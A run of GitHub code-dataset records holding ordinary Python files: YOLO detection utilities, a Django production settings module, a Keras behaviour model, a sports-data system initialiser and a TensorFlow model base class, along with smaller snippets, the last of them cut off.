self._stream.flush()\n\n def stop_kernel(self, id):\n addr = self._kernel_origins.pop(id)\n self._stream.send(addr, zmq.SNDMORE)\n self._stream.send_json([\"stop\", id])\n self._kernels.pop(id)\n","repo_name":"sagemath/sagecell","sub_path":"kernel_dealer.py","file_name":"kernel_dealer.py","file_ext":"py","file_size_in_byte":7334,"program_lang":"python","lang":"en","doc_type":"code","stars":184,"dataset":"github-code","pt":"72"} +{"seq_id":"42281015804","text":"from __future__ import division\nimport torch\n\ndef load_classes(path):\n '''\n 加载类别标签\n path:类别文件路径\n '''\n fp = open(path, 'r')\n names = fp.read().split('\\n')[:] # 读取每一行\n return names\n\ndef to_cpu(tensor):\n return tensor.detach().cpu()\n\ndef xywh2xyxy(x):\n '''\n x,y,w,h --> x,y,x.y\n '''\n y = x.new(x.shape)\n y[..., 0] = x[..., 0] - x[..., 2] / 2\n y[..., 1] = x[..., 1] - x[..., 3] / 2\n y[..., 2] = x[..., 0] + x[..., 2] / 2\n y[..., 3] = x[..., 1] + x[..., 3] / 2\n return y\n\ndef weights_init_normal(m):\n '''\n 权重初始化\n '''\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n torch.nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm2d') != -1:\n torch.nn.init.normal_(m.weight.data, 1.0, 0.02)\n torch.nn.init.constant_(m.bias.data, 0.0)\n\ndef bbox_wh_iou(wh1, wh2):\n '''\n 计算iou,不考虑相对位置,相当于计算两个框的相似度,计算时将左上角对齐\n '''\n wh2 = wh2.t() # 转置\n w1, h1 = wh1[0], wh1[1]\n w2, h2 = wh2[0], wh2[1]\n inter_area = torch.min(w1, w2) * torch.min(h1, h2)\n union_area = (w1 * h1 + 1e-16) + w2 * h2 - inter_area # 这里防止分母为0\n return inter_area / union_area\n\ndef bbox_iou(box1, box2, x1y1x2y2=True):\n '''\n 给定两个矩形框坐标,计算iou,考虑相对位置的\n '''\n if not x1y1x2y2: # 如果给定的是中心坐标(x,y)和宽高(w,h),那么计算出四个角的坐标\n b1_x1, b1_x2 = box1[:, 0] - box1[:, 2] / 2, box1[:, 0] + box1[:, 2] / 2\n b1_y1, b1_y2 = box1[:, 1] - box1[:, 3] / 2, box1[:, 1] + box1[:, 3] / 2\n b2_x1, b2_x2 = box2[:, 0] - box2[:, 2] / 2, box2[:, 0] + box2[:, 2] / 2\n b2_y1, b2_y2 = box2[:, 1] - box2[:, 3] / 2, box2[:, 1] + box2[:, 3] / 2\n else: # 直接给定的就是四个角的坐标\n b1_x1, b1_y1, b1_x2, b1_y2 = box1[:, 0], box1[:, 1], box1[:, 2], box1[:, 3]\n b2_x1, b2_y1, b2_x2, b2_y2 = box2[:, 0], box2[:, 1], box2[:, 2], box2[:, 3]\n \n # 计算两个矩形框交集和并集的面积,画图就知道了\n inter_rect_x1 = torch.max(b1_x1, b2_x1)\n inter_rect_y1 = torch.max(b1_y1, b2_y1)\n inter_rect_x2 = torch.min(b1_x2, b2_x2)\n inter_rect_y2 = torch.min(b1_y2, b2_y2)\n # 交集面积\n inter_area = torch.clamp(inter_rect_x2 - inter_rect_x1 + 1, min=0) * torch.clamp(\n inter_rect_y2 - inter_rect_y1 + 1, min=0\n )\n b1_area = (b1_x2 - b1_x1 + 1) * (b1_y2 - b1_y1 + 1) # 第一个矩形框面积 \n b2_area = (b2_x2 - b2_x1 + 1) * (b2_y2 - b2_y1 + 1) # 第二个矩形框面积\n\n iou = inter_area / (b1_area + b2_area - inter_area + 1e-16) # 防止分母为0\n\n return iou\n\ndef non_max_suppression(prediction, conf_thres=0.5, nms_thres=0.4):\n \"\"\"\n Removes detections with lower object confidence score than 'conf_thres' and performs\n Non-Maximum Suppression to further filter detections.\n Returns detections with shape:\n (x1, y1, x2, y2, object_conf, class_score, class_pred)\n \"\"\"\n\n # From (center x, center y, width, height) to (x1, y1, x2, y2)\n prediction[..., :4] = xywh2xyxy(prediction[..., :4])\n output = [None for _ in range(len(prediction))]\n for image_i, image_pred in enumerate(prediction):\n # Filter out confidence scores below threshold\n image_pred = image_pred[image_pred[:, 4] >= conf_thres]\n # If none are remaining => process next image\n if not image_pred.size(0):\n continue\n # Object confidence times class confidence\n score = image_pred[:, 4] * image_pred[:, 5:].max(1)[0]\n # Sort by it\n image_pred = image_pred[(-score).argsort()]\n class_confs, class_preds = image_pred[:, 5:].max(1, keepdim=True)\n detections = torch.cat((image_pred[:, :5], class_confs.float(), class_preds.float()), 1)\n # Perform non-maximum suppression\n keep_boxes = []\n while detections.size(0):\n large_overlap = bbox_iou(detections[0, :4].unsqueeze(0), detections[:, :4]) > nms_thres\n label_match = detections[0, -1] == detections[:, -1]\n # Indices of boxes with lower confidence scores, large IOUs and matching labels\n invalid = large_overlap & label_match\n weights = detections[invalid, 4:5]\n # Merge overlapping bboxes by order of confidence\n detections[0, :4] = (weights * detections[invalid, :4]).sum(0) / weights.sum()\n keep_boxes += [detections[0]]\n detections = detections[~invalid]\n if keep_boxes:\n output[image_i] = torch.stack(keep_boxes)\n\n return output\n\ndef get_batch_statistics(outputs, targets, iou_threshold):\n \"\"\" Compute true positives, predicted scores and predicted labels per sample \"\"\"\n batch_metrics = []\n for sample_i in range(len(outputs)):\n\n if outputs[sample_i] is None:\n continue\n\n output = outputs[sample_i]\n pred_boxes = output[:, :4]\n pred_scores = output[:, 4]\n pred_labels = output[:, -1]\n\n true_positives = np.zeros(pred_boxes.shape[0])\n\n annotations = targets[targets[:, 0] == sample_i][:, 1:]\n target_labels = annotations[:, 0] if len(annotations) else []\n if len(annotations):\n detected_boxes = []\n target_boxes = annotations[:, 1:]\n\n for pred_i, (pred_box, pred_label) in enumerate(zip(pred_boxes, pred_labels)):\n\n # If targets are found break\n if len(detected_boxes) == len(annotations):\n break\n\n # Ignore if label is not one of the target labels\n if pred_label not in target_labels:\n continue\n\n iou, box_index = bbox_iou(pred_box.unsqueeze(0), target_boxes).max(0)\n if iou >= iou_threshold and box_index not in detected_boxes:\n true_positives[pred_i] = 1\n detected_boxes += [box_index]\n batch_metrics.append([true_positives, pred_scores, pred_labels])\n return batch_metrics\n\ndef ap_per_class(tp, conf, pred_cls, target_cls):\n \"\"\" Compute the average precision, given the recall and precision curves.\n Source: https://github.com/rafaelpadilla/Object-Detection-Metrics.\n # Arguments\n tp: True positives (list).\n conf: Objectness value from 0-1 (list).\n pred_cls: Predicted object classes (list).\n target_cls: True object classes (list).\n # Returns\n The average precision as computed in py-faster-rcnn.\n \"\"\"\n\n # Sort by objectness\n i = np.argsort(-conf)\n tp, conf, pred_cls = tp[i], conf[i], pred_cls[i]\n\n # Find unique classes\n unique_classes = np.unique(target_cls)\n\n # Create Precision-Recall curve and compute AP for each class\n ap, p, r = [], [], []\n for c in tqdm.tqdm(unique_classes, desc=\"Computing AP\"):\n i = pred_cls == c\n n_gt = (target_cls == c).sum() # Number of ground truth objects\n n_p = i.sum() # Number of predicted objects\n\n if n_p == 0 and n_gt == 0:\n continue\n elif n_p == 0 or n_gt == 0:\n ap.append(0)\n r.append(0)\n p.append(0)\n else:\n # Accumulate FPs and TPs\n fpc = (1 - tp[i]).cumsum()\n tpc = (tp[i]).cumsum()\n\n # Recall\n recall_curve = tpc / (n_gt + 1e-16)\n r.append(recall_curve[-1])\n\n # Precision\n precision_curve = tpc / (tpc + fpc)\n p.append(precision_curve[-1])\n\n # AP from recall-precision curve\n ap.append(compute_ap(recall_curve, precision_curve))\n\n # Compute F1 score (harmonic mean of precision and recall)\n p, r, ap = np.array(p), np.array(r), np.array(ap)\n f1 = 2 * p * r / (p + r + 1e-16)\n\n return p, r, ap, f1, unique_classes.astype(\"int32\")\n\n\ndef build_targets(pred_boxes, pred_cls, target, anchors, ignore_thres):\n '''\n pred_boxes:[num_samples, num_anchors, grid_size, grid_size, 4]\n pred_cls:[num_samples, num_anchors, grid_size, grid_size, num_classes]\n target: [num_object, 6] 其中每一行的6个数据分别为:sample_index, classes_index, x, y, w, h详情见datasets.py中的ListDataset类,sample_index表示属于那个样本图片\n anchors:[num_anchors, 2] 当前尺度情况下的\n ignore_thres: int 忽略阈值\n '''\n\n # cuda\n ByteTensor = torch.cuda.ByteTensor if pred_boxes.is_cuda else torch.ByteTensor\n FloatTensor = torch.cuda.FloatTensor if pred_boxes.is_cuda else torch.FloatTensor\n\n nB = pred_boxes.size(0) # num_samples\n nA = pred_boxes.size(1) # num_anchors\n nC = pred_cls.size(-1) # num_classes\n nG = pred_boxes.size(2) # grid_size\n\n # Output tensors\n obj_mask = ByteTensor(nB, nA, nG, nG).fill_(0) # [num_samples, num_anchors, grid_size, grid_size] 全0填充\n noobj_mask = ByteTensor(nB, nA, nG, nG).fill_(1) # 全1填充\n class_mask = FloatTensor(nB, nA, nG, nG).fill_(0) # 全0\n iou_scores = FloatTensor(nB, nA, nG, nG).fill_(0) # 全0\n tx = FloatTensor(nB, nA, nG, nG).fill_(0) \n ty = FloatTensor(nB, nA, nG, nG).fill_(0)\n tw = FloatTensor(nB, nA, nG, nG).fill_(0)\n th = FloatTensor(nB, nA, nG, nG).fill_(0)\n tcls = FloatTensor(nB, nA, nG, nG, nC).fill_(0) # [num_samples, num_anchors, grid_size, grid_size, num_classes] 全0填充\n\n # 转换成相对于方框的位置\n target_boxes = target[:, 2:6] * nG # [num_samples, 4] 原本是归一化尺度,放大到当前尺度\n gxy = target_boxes[:, :2] # [num_object, 2] 中心坐标x,y\n gwh = target_boxes[:, 2:] # [num_object, 2] 框的w,h\n \n # 计算iou最大者\n ious = torch.stack([bbox_wh_iou(anchor, gwh) for anchor in anchors]) # 计算每个anchor和目标框的iou,这里用到了广播机制 [num_anchors, num_object]\n best_ious, best_n = ious.max(0) # 根据iou,计算每个真值框由哪个预设anchor预测,best_n为anchors的索引值,best_ious为相应的最大iou值,形状均为[num_object]\n\n # 获取相应值,调整格式,方便后面计算\n b, target_labels = target[:, :2].long().t() # [num_object, 2] --> [2, num_object], 每一列为sample_index, classes_index, b为sample_index,target_labels为classes_index\n gx, gy = gxy.t() # [2, num_object] 中心坐标\n gw, gh = gwh.t() # [2, num_object] w,h\n gi, gj = gxy.long().t() # [2, num_object] 取正,取到网格格点\n\n # 设置mask\n obj_mask[b, best_n, gj, gi] = 1 # iou最大的那个gird负责预测\n noobj_mask[b, best_n, gj, gi] = 0 # 与obj_mask意义相反\n\n # 当iou超过忽略阈值时,将noobj mask设置为零,表示该网格有物体\n for i, anchor_ious in enumerate(ious.t()): # ious.t() ---> [num_object, num_anchors]\n noobj_mask[b[i], anchor_ious > ignore_thres, gj[i], gi[i]] = 0\n \n # 论文公式 实际预测的是tx,ty,为偏移格点的偏移量,tw,th为宽高和anchor宽高比的对数,这里计算的是真值\n tx[b, best_n, gj, gi] = gx - gx.floor()\n ty[b, best_n, gj, gi] = gy - gy.floor()\n tw[b, best_n, gj, gi] = torch.log(gw / anchors[best_n][:, 0] + 1e-16)\n th[b, best_n, gj, gi] = torch.log(gh / anchors[best_n][:, 1] + 1e-16)\n\n # label one-hot编码\n tcls[b, best_n, gj, gi, target_labels] = 1\n\n # class_mask 表示分类正确的那个位置置为1\n class_mask[b, best_n, gj, gi] = (pred_cls[b, best_n, gj, gi].argmax(-1) == target_labels).float()\n # 计算预测的框和真实框的iou值\n iou_scores[b, best_n, gj, gi] = bbox_iou(pred_boxes[b, best_n, gj, gi], target_boxes, x1y1x2y2=False)\n\n tconf = obj_mask.float()\n return iou_scores, class_mask, obj_mask, noobj_mask, tx, ty, tw, th, tcls, tconf\n","repo_name":"ziyaxuanyi/my-yolo","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11862,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"31924612463","text":"def error_example():\n try:\n user_input = int(input(\"Please enter your number for division: \"))\n \n while user_input > 0:\n number_divide = user_input / 0\n \n except NameError:\n print('Wrong name type')\n \n except ValueError:\n print('Wrong value error')\n \n except ZeroDivisionError:\n print('You cannot divide by 0!')\n \nerror_example()\n ","repo_name":"MikeTheMarketer/errors-and-exception-handling","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74358417513","text":"import libsql_experimental\n\ncon = libsql_experimental.connect(\"hello.db\", sync_url=\"http://localhost:8080\",\n auth_token=\"\")\n\ncon.sync()\n\ncur = con.cursor()\n\ncur.execute(\"CREATE TABLE IF NOT EXISTS users (id INTEGER, email TEXT);\")\ncur.execute(\"INSERT INTO users VALUES (1, 'penberg@iki.fi')\")\n\nprint(cur.execute(\"SELECT * FROM users\").fetchone())\n","repo_name":"libsql/libsql-experimental-python","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"18535928422","text":"import os\nimport sentry_sdk\nfrom sentry_sdk.integrations.django import DjangoIntegration\nfrom carbon0.settings.base import *\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\n# Configure the Sentry SDK (this way we can still get error logs)\nsentry_sdk.init(\n dsn=str(os.getenv(\"SENTRY_DSN\")),\n integrations=[DjangoIntegration()],\n traces_sample_rate=1.0,\n # associate users to errors\n send_default_pii=True,\n)\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = str(os.getenv(\"SECRET_KEY\"))\n\nALLOWED_HOSTS = [\"carbon0.herokuapp.com\", \"playcarbon0.com\"]\n\n# File paths for the Zeron model files\nDIET_ZERON_PATHS = [str(os.getenv(\"DIET_GLB\")), str(os.getenv(\"DIET_USDZ\"))]\nTRANSIT_ZERON_PATHS = [str(os.getenv(\"TRANSIT_GLB\")), str(os.getenv(\"TRANSIT_USDZ\"))]\nTREE_ZERON_PATHS = [str(os.getenv(\"TREE_GLB\")), str(os.getenv(\"TREE_USDZ\"))]\nRECYCLING_ZERON_PATHS = [\n str(os.getenv(\"RECYCLING_GLB\")),\n str(os.getenv(\"RECYCLING_USDZ\")),\n]\nAT_ZERON_PATHS = [str(os.getenv(\"AT_GLB\")), str(os.getenv(\"AT_USDZ\"))]\nUTIL_ZERON_PATHS = [str(os.getenv(\"UTIL_GLB\")), str(os.getenv(\"UTIL_USDZ\"))]\n\n# Mixpanel Project Token\nMP_PROJECT_TOKEN = str(os.getenv(\"MP_PROJECT_TOKEN\", \"\"))\n\n# Using Upgraded Authorization for S3 objects: \n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings\nAWS_S3_SIGNATURE_VERSION = 's3v4'\nAWS_S3_REGION_NAME = 'us-east-2'\n","repo_name":"Carbon0-Games/carbon0-web-app","sub_path":"carbon0/carbon0/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"42323670954","text":"\"\"\"System Initialize\n\nThis script allows the user to initialize the analysis system.\n\nThis file can also be imported as a module and contains the following\nfunctions:\n\n * create_directory_structures\n * convert_fit_files_to_csv\n * initialize_critical_swim_speed\n * initialize_lactate_threshold\n * initialize_system\n * initialize_features\n\"\"\"\n\n\n# Packages\nimport os\nimport json\nimport pandas as pd\nfrom data_loader import DataLoader\nfrom configparser import ConfigParser\n# Self-defined modules\nimport utility\nfrom fit_file_convert import process_all\nathlete_info_json_path = utility.get_athlete_info_path()\n\n\ndef create_directory_structures():\n \"\"\" Create all the directories and folders that are needed for the project\n \"\"\"\n utility.create_all_folders()\n\n\ndef convert_fit_files_to_csv():\n internal_args_list = utility.get_fit_file_internal_args()\n if internal_args_list:\n for internal_args in internal_args_list:\n process_all.main(internal_args=internal_args)\n utility.SystemReminder().display_fit_file_converted(internal_args[1].split('=')[1][4:])\n\n\ndef initialize_configurations():\n \"\"\" Create all files, config and json, that are needed for the project\n \"\"\"\n initialize_json()\n initialize_config()\n\n\ndef initialize_config():\n athletes_with_csv = [file_name[:-4] for file_name in os.listdir('{}/data'.format(os.pardir))\n if file_name.endswith('.csv')]\n athletes_with_fit = [' '.join(file_name.split('_')[1:]) for file_name in os.listdir('{}/data'.format(os.pardir))\n if file_name.startswith('fit_')]\n config_path = utility.data_names_config\n parser = ConfigParser()\n if not os.path.exists(config_path):\n for section in ['DEFAULT', 'SPREADSHEET-DATA-SETS', 'ADDITIONAL-DATA-FOLDERS',\n 'CLEANED-SPREADSHEET-DATA-SETS', 'CLEANED-ADDITIONAL-DATA-SETS']:\n parser[section] = {}\n else:\n parser.read(config_path)\n\n for athletes_name in athletes_with_csv:\n if athletes_name.title() not in parser['SPREADSHEET-DATA-SETS'].keys():\n parser['SPREADSHEET-DATA-SETS'][athletes_name] = '{}.csv'.format(athletes_name.title())\n if athletes_name.title() not in parser['CLEANED-SPREADSHEET-DATA-SETS'].keys():\n parser['CLEANED-SPREADSHEET-DATA-SETS'][athletes_name] = 'cleaned_spreadsheet/{}.csv'.format(athletes_name.title())\n for athletes_name in athletes_with_fit:\n if athletes_name.title() not in parser['ADDITIONAL-DATA-FOLDERS'].keys():\n parser['ADDITIONAL-DATA-FOLDERS'][athletes_name] = 'csv_{}'.format('_'.join(athletes_name.split(' ')))\n if athletes_name.title() not in parser['CLEANED-ADDITIONAL-DATA-SETS'].keys():\n parser['CLEANED-ADDITIONAL-DATA-SETS'][athletes_name] = 'cleaned_additional/{}'.format('_'.join(athletes_name.split(' ')))\n with open(config_path, 'w') as config_file:\n parser.write(config_file)\n\n\ndef initialize_json():\n athletes_names = [file_name[:-4] for file_name in os.listdir('{}/data'.format(os.pardir))\n if file_name.endswith('.csv') ]\n if not os.path.exists(athlete_info_json_path):\n with open(athlete_info_json_path, 'w') as file:\n json.dump({}, file, indent=4)\n with open(athlete_info_json_path, 'r') as file:\n athletes_info_json = json.load(file)\n for athletes_name in athletes_names:\n if athletes_name.title() not in athletes_info_json:\n athletes_info_json[athletes_name.title()] = {\n \"athlete type\": None,\n \"gender\": None,\n \"age\": None,\n \"height\": None,\n \"pre weight\": None,\n \"post weight\": None,\n \"injuries\": None,\n \"critical swim speed\": None,\n \"joe freil lactate threshold\": None,\n \"andy coogan lactate threshold\": None,\n \"training load best models\": {\"running\": None, \"swimming\": None, \"cycling\": None,\n \"strength_training\": None, \"others\": None},\n \"performance best models\": {\"running\": None, \"swimming\": None, \"cycling\": None}\n }\n athletes_info_json[athletes_name.title()][\"training load best models\"] = {\"running\": None, \"swimming\": None, \"cycling\": None,\n \"strength_training\": None, \"others\": None}\n with open(athlete_info_json_path, 'w') as file:\n json.dump(athletes_info_json, file, indent=4)\n\n\ndef initialize_critical_swim_speed(athletes_name: str):\n ''' Initialize the critical swim speed of an athlete\n Parameters\n ----------\n athletes_name: str\n '''\n data_loader_additional = DataLoader('additional')\n cleaned_additional_data_filenames = data_loader_additional.load_cleaned_additional_data(athletes_name)\n\n def _calculate_css():\n first_50m_distance, first_50m_times, first_400m_distance, first_400m_times = [], [], [], []\n for file_name in [file_name for file_name in cleaned_additional_data_filenames if 'swimming' in file_name]:\n df = pd.read_csv(file_name)\n time, distance = list(df['time_in_seconds']), list(df['distance'])\n for i, d in enumerate(distance):\n distance_in_meters = int((d - distance[0]) * 1000)\n if abs(distance_in_meters-50) < 5:\n first_50m_times.append(time[i]-time[0])\n first_50m_distance.append(distance_in_meters)\n if abs(distance_in_meters-400) < 10:\n first_400m_times.append(time[i]-time[0])\n first_400m_distance.append(distance_in_meters)\n mean_dis_diff = sum(first_400m_distance)/len(first_400m_distance) - sum(first_50m_distance)/len(first_50m_distance)\n mean_time_diff = sum(first_400m_times)/len(first_400m_times) - sum(first_50m_times)/len(first_50m_times)\n return (mean_dis_diff/mean_time_diff)\n\n return _calculate_css()\n\n\ndef initialize_lactate_threshold(athletes_name: str):\n ''' Initialize the lactate threshold of an athlete\n Parameters\n ----------\n athletes_name: str\n '''\n data_loader_additional = DataLoader('additional')\n cleaned_additional_data_filenames = data_loader_additional.load_cleaned_additional_data(athletes_name)\n\n def _calculate_Joe_Freil_lactate_threshold():\n heart_rate_entry=[]\n for file_name in [file_name for file_name in cleaned_additional_data_filenames if 'running' in file_name]:\n temporary_list=[]\n df = pd.read_csv(file_name)\n if df['heart_rate'].isnull().values.any()==True:\n continue\n time, heart_rate = list(df['time_in_seconds']), list(df['heart_rate'])\n for i,t in enumerate(time):\n time_difference_current=time[i]-time[0]\n if 600 <= time_difference_current <= 1805:\n temporary_list.append(heart_rate[i])\n if abs(time_difference_current-1805)<5:\n heart_rate_entry=heart_rate_entry+temporary_list\n break\n average_heart_rate=sum(heart_rate_entry)/len(heart_rate_entry)\n return average_heart_rate\n\n def _calculate_Andy_Coogan__lactate_threshold():\n heart_rate_entry = []\n for file_name in [file_name for file_name in cleaned_additional_data_filenames if 'running' in file_name]:\n temporary_list = []\n df = pd.read_csv(file_name)\n if df['heart_rate'].isnull().values.any() == True:\n continue\n time, heart_rate = list(df['time_in_seconds']), list(df['heart_rate'])\n for i, t in enumerate(time):\n time_difference_current = time[i] - time[0]\n if time_difference_current <= 3605:\n temporary_list.append(heart_rate[i])\n if abs(time_difference_current - 3605) < 5:\n heart_rate_entry = heart_rate_entry + temporary_list\n break\n average_heart_rate = sum(heart_rate_entry) / len(heart_rate_entry)\n return average_heart_rate\n\n return _calculate_Joe_Freil_lactate_threshold(), _calculate_Andy_Coogan__lactate_threshold()\n\n\ndef initialize_system():\n \"\"\" Initialize the whole system\n \"\"\"\n utility.SystemReminder().display_initialization_start()\n create_directory_structures()\n convert_fit_files_to_csv()\n initialize_configurations()\n utility.SystemReminder().display_initialization_end()\n\n\ndef initialize_characteristics(athletes_name):\n with open(athlete_info_json_path, 'r') as file:\n athletes_info_json = json.load(file)\n athletes_css = initialize_critical_swim_speed(athletes_name)\n athletes_info_json[athletes_name.title()][\"critical swim speed\"] = athletes_css\n jf_threshold, ac_threshold = initialize_lactate_threshold(athletes_name)\n athletes_info_json[athletes_name.title()][\"joe freil lactate threshold\"] = jf_threshold\n athletes_info_json[athletes_name.title()][\"andy coogan lactate threshold\"] = ac_threshold\n with open(athlete_info_json_path, 'w') as file:\n json.dump(athletes_info_json, file, indent=4)\n\n\n\nif __name__ == '__main__':\n athletes_names = ['Eduardo Oliveira', 'Xu Chen', 'Carly Hart']\n initialize_system()\n\n","repo_name":"Data-Science-Project-G13/monitoring-athletes-performance","sub_path":"main/system_initialize.py","file_name":"system_initialize.py","file_ext":"py","file_size_in_byte":9479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7117663803","text":"import pickle as pickle\n\nimport numpy as np\nfrom keras import Input, Model\nfrom keras.layers import Dense\nfrom keras.models import load_model\n\nfrom pursuit.agents.ad_hoc.models.base_model import BaseModel\n\n\nclass BehaviorModel(BaseModel):\n\n def __init__(self, model_size):\n super().__init__(model_size)\n self.x = None\n self.y = None\n self.model = None\n self.metric = []\n self.ids = None\n self.cache = {}\n\n def init(self, num_state_features, actions):\n self.x = np.zeros((0, num_state_features))\n self.y = np.zeros((0, 4))\n\n input = Input(shape=(num_state_features,))\n previous_layer = input\n for size in self.model_size:\n previous_layer = Dense(size, activation='selu')(previous_layer)\n output = Dense(4, activation='softmax')(previous_layer)\n\n model = Model(input, output)\n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n self.model = model\n self.ids = [x[0] for x in actions]\n\n def train(self, state, actions, fit=True, compute_metrics=True):\n for agent_id, action in actions:\n state_features = state.features_relative_agent(agent_id).reshape(1, -1)\n if self.x is None:\n self.init(state_features.shape[1], actions)\n # 1-hot encode\n actions_array = np.zeros((1, 4))\n actions_array[0, action] = 1\n\n # append to dataset\n self.x = np.append(self.x, state_features, axis=0)\n self.y = np.append(self.y, actions_array, axis=0)\n\n # compute accuracy\n if compute_metrics:\n predicted_y = self.predict(state)\n hits = [predicted_y[i] == actions[i][1] for i in range(len(actions))]\n self.metric.append(sum(hits)/len(actions))\n\n # train\n if fit:\n self.cache.clear()\n self.model.fit(self.x, self.y, epochs=100, verbose=1)\n\n def predict(self, state):\n if len(self.cache) >= 10*1000:\n print('cleared cache')\n self.cache.clear()\n\n if state not in self.cache:\n state_features = np.zeros((len(self.ids), len(self.x[0])))\n for i, agent_id in enumerate(self.ids):\n state_features[i] = state.features_relative_agent(agent_id).reshape(1, -1)\n\n predicted_y = np.array(self.model.predict(state_features))\n self.cache[state] = predicted_y\n\n predicted_y = self.cache[state]\n # return np.argmax(predicted_y, axis=1)\n return np.array([np.random.choice(range(4), p=p) for p in predicted_y])\n\n # def save(self, filename):\n # if self.model is not None:\n # self.model.save(filename + '.model')\n # d = dict(self.__dict__)\n # d.pop('model')\n # f = open(filename, 'wb')\n # pickle.dump(d, f)\n # f.close()\n\n\n # @staticmethod\n # def load(filename):\n # model = load_model(filename + '.model')\n # f = open(filename, 'rb')\n # attrs = pickle.load(f)\n # f.close()\n # obj = BehaviorModel(attrs['model_size'])\n # for key, value in attrs.items():\n # setattr(obj, key, value)\n # obj.model = model\n # return obj","repo_name":"goncalo-rodrigues/thesis","sub_path":"pursuit/agents/ad_hoc/models/behavior_model.py","file_name":"behavior_model.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3904789856","text":"import abc\nimport inspect\nimport pathlib\nimport importlib\nfrom dataclasses import dataclass\nfrom typing import List, Dict, Any\n\nfrom dffml.base import field\nfrom dffml.feature.feature import Feature, Features\nfrom dffml.source.source import Sources, SourcesContext\nfrom dffml.model.model import ModelContext, Model, ModelNotTrained\n\n\n@dataclass\nclass TensorflowBaseConfig:\n predict: Feature = field(\"Feature name holding target values\")\n features: Features = field(\"Features to train on\")\n location: pathlib.Path = field(\"Location where state should be saved\")\n steps: int = field(\"Number of steps to train the model\", default=3000)\n epochs: int = field(\n \"Number of iterations to pass over all records in a source\", default=30\n )\n hidden: List[int] = field(\n \"List length is the number of hidden layers in the network. Each entry in the list is the number of nodes in that hidden layer\",\n default_factory=lambda: [12, 40, 15],\n )\n\n\nclass TensorflowModelContext(ModelContext):\n \"\"\"\n Tensorflow based model contexts should derive from this model context. As it\n provides much of the bootstrapping such as mapping data types to feature\n columns.\n \"\"\"\n\n def __init__(self, parent):\n super().__init__(parent)\n self.tf = importlib.import_module(\"tensorflow\")\n self.np = importlib.import_module(\"numpy\")\n\n async def predict_input_fn(self, sources: SourcesContext, **kwargs):\n \"\"\"\n Uses the numpy input function with data from record features.\n \"\"\"\n x_cols: Dict[str, Any] = {\n feature: [] for feature in self.parent.features\n }\n ret_records = []\n async for record in sources.with_features(self.parent.features):\n ret_records.append(record)\n for feature, results in record.features(\n self.parent.features\n ).items():\n x_cols[feature].append(self.np.array(results))\n for feature in x_cols:\n x_cols[feature] = self.np.array(x_cols[feature])\n self.logger.info(\"------ Record Data ------\")\n self.logger.info(\"x_cols: %d\", len(list(x_cols.values())[0]))\n self.logger.info(\"-----------------------\")\n input_fn = self.tf.compat.v1.estimator.inputs.numpy_input_fn(\n x_cols, shuffle=False, num_epochs=1, **kwargs\n )\n return input_fn, ret_records\n\n async def train(self, sources: Sources):\n \"\"\"\n Train on data submitted via classify.\n \"\"\"\n input_fn = await self.training_input_fn(sources)\n self.parent.model.train(\n input_fn=input_fn, steps=self.parent.config.steps\n )\n self.is_trained = True\n\n async def get_predictions(self, sources: SourcesContext):\n if not self.is_trained:\n raise ModelNotTrained(\"Train model before prediction.\")\n # Create the input function\n input_fn, predict = await self.predict_input_fn(sources)\n # Makes predictions on classifications\n predictions = self.parent.model.predict(input_fn=input_fn)\n target = self.parent.config.predict.name\n\n return predict, predictions, target\n\n\nclass TensorflowModel(Model):\n def __init__(self, config):\n super().__init__(config)\n self._model = None\n self.tf = importlib.import_module(\"tensorflow\")\n self.feature_columns = self._feature_columns()\n self.features = self._applicable_features()\n self.is_trained = self.model_path.exists()\n\n def _feature_columns(self):\n \"\"\"\n Converts records into training data\n \"\"\"\n cols: Dict[str, Any] = {}\n for feature in self.config.features:\n col = self._feature_feature_column(feature)\n if not col is None:\n cols[feature.name] = col\n return cols\n\n def _feature_feature_column(self, feature: Feature):\n \"\"\"\n Creates a feature column for a feature\n \"\"\"\n dtype = feature.dtype\n if not inspect.isclass(dtype):\n self.logger.warning(\n \"Unknown dtype %r. Cound not create column\" % (dtype)\n )\n return None\n if (\n dtype is int\n or issubclass(dtype, int)\n or dtype is float\n or issubclass(dtype, float)\n ):\n return self.tf.feature_column.numeric_column(\n feature.name, shape=feature.length\n )\n self.logger.warning(\n \"Unknown dtype %r. Cound not create column\" % (dtype)\n )\n return None\n\n def _applicable_features(self):\n return [\n name\n for name in self.config.features.names()\n if name in self.feature_columns\n ]\n\n @property\n def model_path(self):\n return self.location / \"DNNModel\"\n\n async def __aenter__(self):\n await super().__aenter__()\n return self\n\n async def __aexit__(self, exc_type, exc_value, traceback):\n await super().__aexit__(exc_type, exc_value, traceback)\n\n @property\n @abc.abstractmethod\n def model(self):\n \"\"\"\n Create the model and return the handle to it.\n \"\"\"\n raise (NotImplementedError(\"Cannot use model from base class.\"))\n","repo_name":"intel/dffml","sub_path":"model/tensorflow/dffml_model_tensorflow/tf_base.py","file_name":"tf_base.py","file_ext":"py","file_size_in_byte":5294,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"72"} +{"seq_id":"16990778873","text":"import matplotlib.pyplot as plt\n\n\ndef p(x):\n f = x ** 3 - x + 2\n return f\n\n\nx = []\nfor number in range(-5, 6):\n x.append(number)\nprint(\"x_points: 